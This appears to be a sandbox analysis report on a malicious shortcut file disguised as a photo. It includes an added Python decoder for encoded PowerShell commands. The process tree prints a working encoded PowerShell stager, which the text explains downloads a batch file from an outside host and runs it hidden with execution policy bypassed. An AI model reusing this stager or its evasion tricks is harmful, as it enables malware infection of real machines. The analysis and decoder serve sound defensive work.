Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    31/01/2024, 08:13

General

  • Target

    Photo02.jpg.lnk

  • Size

    2KB

  • MD5

    a9c696e8139ba0cfdf3241131fff2d1e

  • SHA1

    0607510c26a987944ad5a7da23ebaa69a21e70ed

  • SHA256

    fcb534128c207ff3e66cadc7e6400ce3987374d151aac8e7aa741aadd6a70a88

  • SHA512

    b933fa80f6eb65be5bb05d8cb8e3ebfbe8c97cad970271d7674d33a72bc8426a20ce17be698f35fcc75592dd479bb80579ceee2454ee4af1c80c616b84cd57ad

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
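The PowerShell argument recorded in the process tree above is passed with -eC, an abbreviation of -EncodedCommand, so it is base64 over UTF-16LE rather than plain text. The decoder below is an added example, not part of the sandbox report or its tooling: it extracts the blob from the recorded cmd.exe command line, decodes it, folds the Unicode right double quotation marks (U+201D) that the script uses in place of ASCII quotes (PowerShell's tokenizer accepts them, naive string matching on '"' does not), collapses the tab padding, and lists the URL, file paths and cmdlets. Run against this report's command line it recovers an Invoke-WebRequest download of http://vybsnf3.sa.com/med.bat to $ENV:temp\jrbbsfr.bat followed by Invoke-Item on that file, i.e. a download-and-execute stager. The regular expressions and helper names are my own.

```python
"""Decode a PowerShell -EncodedCommand argument and pull IoCs out of it."""
import base64
import re
from typing import Dict, List, Optional

# The cmd.exe -> powershell.exe command line recorded in the report's process tree.
REPORT_CMDLINE = (
    "CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC "
    "IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the prefix family, case-insensitively, rather than one literal flag.
# -ex / -exec (ExecutionPolicy) do not match: after "-e" only c, n... or whitespace may follow.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc?[a-z]*)?\s+([A-Za-z0-9+/=]+)")

# Unicode quotes that PowerShell treats as ordinary string delimiters.
_SMART_QUOTES = str.maketrans({
    "\u201c": '"', "\u201d": '"', "\u201e": '"',
    "\u2018": "'", "\u2019": "'", "\u201a": "'", "\u201b": "'",
})

_URL_RE = re.compile(r"https?://[^\s\"'<>;]+", re.I)
_PATH_RE = re.compile(r"(?:\$env:[a-z_]+|[a-z]:)\\[^\s\"'<>;]+", re.I)
_CMDLET_RE = re.compile(r"\b[a-z]+-[a-z]+\b", re.I)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 blob passed to -EncodedCommand, or None if there is none."""
    m = _ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; PowerShell tolerates missing '=' padding."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def normalize(script: str) -> str:
    """Fold smart quotes to ASCII quotes and tabs/runs of spaces to single spaces."""
    return " ".join(script.translate(_SMART_QUOTES).split())


def extract_iocs(script: str) -> Dict[str, List[str]]:
    """Pull URLs, file paths and the Verb-Noun cmdlets out of a normalized script."""
    return {
        "urls": _URL_RE.findall(script),
        "paths": _PATH_RE.findall(script),
        "cmdlets": sorted({c.lower() for c in _CMDLET_RE.findall(script)}),
    }


def analyze(cmdline: str) -> Dict[str, object]:
    """Command line -> decoded script -> normalized script -> IoCs."""
    blob = extract_encoded_command(cmdline)
    if blob is None:
        return {"encoded": False, "script": None, "iocs": {}}
    script = normalize(decode_encoded_command(blob))
    return {"encoded": True, "script": script, "iocs": extract_iocs(script)}


if __name__ == "__main__":
    result = analyze(REPORT_CMDLINE)
    print(result["script"])
    for kind, values in result["iocs"].items():
        print(f"{kind}: {values}")
```

Normalizing before matching matters here: the mixed-case cmdlet names, the tabs and the U+201D quotes are all cheap evasions of signatures written against the canonical `Invoke-WebRequest -Uri "..."` form, and they disappear once the decoded text is folded.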

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • memory/3012-40-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

          Filesize

          2.9MB

        • memory/3012-41-0x0000000002490000-0x0000000002498000-memory.dmp

          Filesize

          32KB

        • memory/3012-42-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

          Filesize

          9.6MB

        • memory/3012-43-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-45-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-44-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

          Filesize

          9.6MB

        • memory/3012-46-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-47-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-48-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

          Filesize

          9.6MB